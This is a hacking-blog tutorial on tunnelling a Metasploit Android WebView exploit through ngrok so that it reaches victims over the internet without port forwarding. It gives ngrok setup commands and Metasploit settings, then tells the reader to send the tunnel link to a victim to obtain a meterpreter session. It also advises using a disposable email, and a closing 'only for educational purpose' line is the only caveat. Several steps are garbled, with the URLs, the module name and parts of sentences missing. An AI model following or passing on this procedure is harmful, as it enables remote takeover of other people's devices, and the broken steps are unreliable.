Use Metasploit on WAN without Port Forwarding

all of my previous Metasploit articles or videos, I am always performing
attacks on LAN. Lots of people were asking me how to use Metasploit on the
Internet or WAN. One way is to port forward the router. But in today’s post, I
am going to use a different method which doesn’t require any port forwarding.

Setting Ngrok

First of all, we start with creating account at
Use any disposable email service to sign up.
After signing up, log in to and download the ngrok
Now extract the file and open terminal in that folder.
Log in again to your ngrok account and type the commands
available on that page.

Copy the authentication code command and paste in the terminal.

./ngrok authtoken

With the above command, the authentication code will be saved in
your computer.
Now type the following command to start the tunnel.

./ngrok http

Now the ngrok will start a tunnel to your computer. Copy the
Ngrok URL we will need this URL later in this tutorial. Also remember the port
in above command.

Using Metasploit with

For this tutorial, we are using Android web view exploit.
Open terminal and type msfconsole.
Now type the following command to load Android web view exploit.


Now while setting SRVHOST and LHOST use localhost.

set srvhost localhost
set lhost localhost

In SRVPORT we will use same port that we have used while
starting ngrok .i.e 4431.

set srvport 4431

Now set URIPATH to /. Use the following commands.

set uripath /

Above three steps are most important, so don’t change the
Then enter run to start exploit.
Now you can send the link that you have got when you started
Ngrok to the victim and you we be able to get the
meterpreter session over the internet

Video Demonstration

Use Social Engineering
Toolkit without Port Forwarding


Don’t change the values of srvhost, lhost and uripath.
Make sure srvport and port you set while starting ngrok are
Only for educational purpose. 


article has been written by Aditya Joshi who writes for
and can be reached on @darktruth190
Irfan Shakeel
irfan shakeel, the founder of ehacking project, he also hosts classes at eh academy. he has found many vulnerabilities in the world’s known platforms, he has been providing it security training since 2010. you might have read his articles and opinion on ibm developers, infosec institute, alienvault, eh academy and other known blogs. follow him on twitter, linkedin and quora.

Most Popular

How to Exploit Heartbleed using Metasploit in Kali Linux

Heartbleed vulnerability (registered as CVE-2014-0160) is a security bug present in the older version of OpenSSL cryptographic library. OpenSSL is a cryptographic toolkit used...

How to Install Parrot Security OS on VirtualBox in 2020

Parrot Security OS is a free GNU/LINUX distribution, released on 10th April 2013. It is a mixture of Kali Linux and Frozenbox OS, aims to...

How to Install Kali Linux on VirtualBox [Windows Host] in 2020

Kali Linux is a Debian based Linux distribution, released on the 13th March 2013 as a complete rebuild of BackTrack Linux. It is one of...

Acunetix v13 Release Introduces Groundbreaking Innovations

The newest release of the Acunetix Web Vulnerability Scanner further improves performance and premieres best-of-breed technologies London, United Kingdom – February 5, 2019 – Acunetix,...